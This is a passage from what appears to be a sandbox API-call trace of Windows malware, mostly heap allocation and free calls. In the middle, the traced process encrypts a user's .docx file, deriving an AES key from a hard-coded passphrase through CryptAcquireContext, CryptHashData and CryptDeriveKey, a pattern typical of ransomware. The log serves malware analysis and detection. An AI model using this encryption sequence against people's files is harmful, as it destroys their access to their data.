dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.783] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.783] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.784] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.786] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9de8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0077.786] CloseHandle (hObject=0x298) returned 1 [0077.786] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.786] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0077.786] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\oZbDkszpyQazC9.docx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadbfd0d0, ftCreationTime.dwHighDateTime=0x1d5b0eb, ftLastAccessTime.dwLowDateTime=0xacc27920, ftLastAccessTime.dwHighDateTime=0x1d5bce0, ftLastWriteTime.dwLowDateTime=0xacc27920, ftLastWriteTime.dwHighDateTime=0x1d5bce0, nFileSizeHigh=0x0, nFileSizeLow=0x13e27, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="oZbDkszpyQazC9.docx", cAlternateFileName="OZBDKS~1.DOC")) returned 0x41ac780 [0077.787] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0077.787] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.787] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.787] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0077.787] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.787] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0077.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0077.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797008, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0077.787] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0077.788] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0077.788] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.788] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0077.788] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.788] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.788] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.788] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.788] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.788] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca778, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0077.789] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0077.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.789] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0077.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.789] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0077.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca940, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0077.789] CryptHashData (hHash=0x41ac200, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0077.789] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.789] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0077.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca4a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0077.790] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac200, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac2c0) returned 1 [0077.790] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.790] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0077.790] CryptDestroyHash (hHash=0x41ac200) returned 1 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0077.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0077.791] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0077.791] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0077.791] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 